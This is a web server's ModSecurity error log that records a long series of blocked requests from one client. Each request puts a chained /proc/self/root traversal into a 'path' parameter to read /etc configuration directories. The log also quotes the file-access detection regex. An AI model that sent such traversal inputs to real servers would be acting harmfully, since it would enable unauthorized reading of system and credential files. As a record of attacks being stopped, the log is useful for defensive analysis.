[Tue Mar 17 09:33:09.226468 2026] [:error] [pid 2553:tid 140411624429312] [client 74.7.243.203:44644] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablKBf0Bec_B9OkZP_i9RgAAAs4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:33:10.542648 2026] [:error] [pid 2473:tid 140411741927168] [client 74.7.243.203:48210] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablKBqBJNF7axNlVR0X8rgAAAAA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:33:11.849188 2026] [:error] [pid 2553:tid 140411683178240] [client 74.7.243.203:48226] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablKB_0Bec_B9OkZP_i9RwAAAsc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:33:13.135545 2026] [:error] [pid 11293:tid 140411590858496] [client 74.7.243.203:48240] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablKCdCmCSWTlPouqorMIgAAANI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:33:13.345931 2026] [:error] [pid 11293:tid 140411741927168] [client 74.7.243.203:48240] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablKCdCmCSWTlPouqorMIwAAAMA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:33:14.725834 2026] [:error] [pid 11293:tid 140411548894976] [client 74.7.243.203:48246] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablKCtCmCSWTlPouqorMJQAAANc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:33:17.068098 2026] [:error] [pid 11469:tid 140411574073088] [client 74.7.243.203:48254] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablKDZDEJR9VXonE_-1PKQAAARQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:33:19.374021 2026] [:error] [pid 11293:tid 140411716749056] [client 74.7.244.31:57912] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ablKDtCmCSWTlPouqorMJwAAAMM"]
[Tue Mar 17 09:33:19.375175 2026] [:error] [pid 1016:tid 140411557287680] [client 74.7.243.203:48256] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablKDpqmL8PQht4WJFlIFwAAAVY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:33:21.786669 2026] [:error] [pid 2473:tid 140411616036608] [client 74.7.243.203:48964] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablKEKBJNF7axNlVR0X8uQAAAA8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:33:25.490307 2026] [:error] [pid 1731:tid 140411716749056] [client 74.7.243.203:48978] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablKFAb2qCuy5irgBMjJYQAAAEM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:33:26.845847 2026] [:error] [pid 2325:tid 140411699963648] [client 74.7.243.203:48994] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablKFu82sZHvlq4xgHrCoAAAAoU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:33:28.163126 2026] [:error] [pid 2473:tid 140411582465792] [client 74.7.243.203:49008] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablKGKBJNF7axNlVR0X8wgAAABM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:33:30.491320 2026] [:error] [pid 1210:tid 140411599251200] [client 74.7.243.203:49018] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablKGlKJy4A1bGlmj9BV4QAAAlE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:33:31.828812 2026] [:error] [pid 1210:tid 140411741927168] [client 74.7.243.203:37478] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablKG1KJy4A1bGlmj9BV5AAAAkA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:33:34.180096 2026] [:error] [pid 2553:tid 140411666392832] [client 74.7.243.203:37490] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablKHv0Bec_B9OkZP_i9TQAAAsk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:33:35.510629 2026] [:error] [pid 11469:tid 140411733534464] [client 74.7.243.203:37506] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablKH5DEJR9VXonE_-1PLgAAAQE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:33:36.811846 2026] [:error] [pid 2553:tid 140411741927168] [client 74.7.243.203:37508] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablKIP0Bec_B9OkZP_i9TwAAAsA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:33:38.773658 2026] [:error] [pid 2325:tid 140411725141760] [client 74.7.243.203:37524] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablKIu82sZHvlq4xgHrCpgAAAoI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:33:40.172939 2026] [:error] [pid 2325:tid 140411574073088] [client 74.7.243.203:49820] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablKJO82sZHvlq4xgHrCqAAAApQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:33:41.536125 2026] [:error] [pid 11469:tid 140411624429312] [client 74.7.243.203:49828] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablKJZDEJR9VXonE_-1PMgAAAQ4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:33:42.875029 2026] [:error] [pid 1210:tid 140411708356352] [client 74.7.243.203:49840] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablKJlKJy4A1bGlmj9BV5wAAAkQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
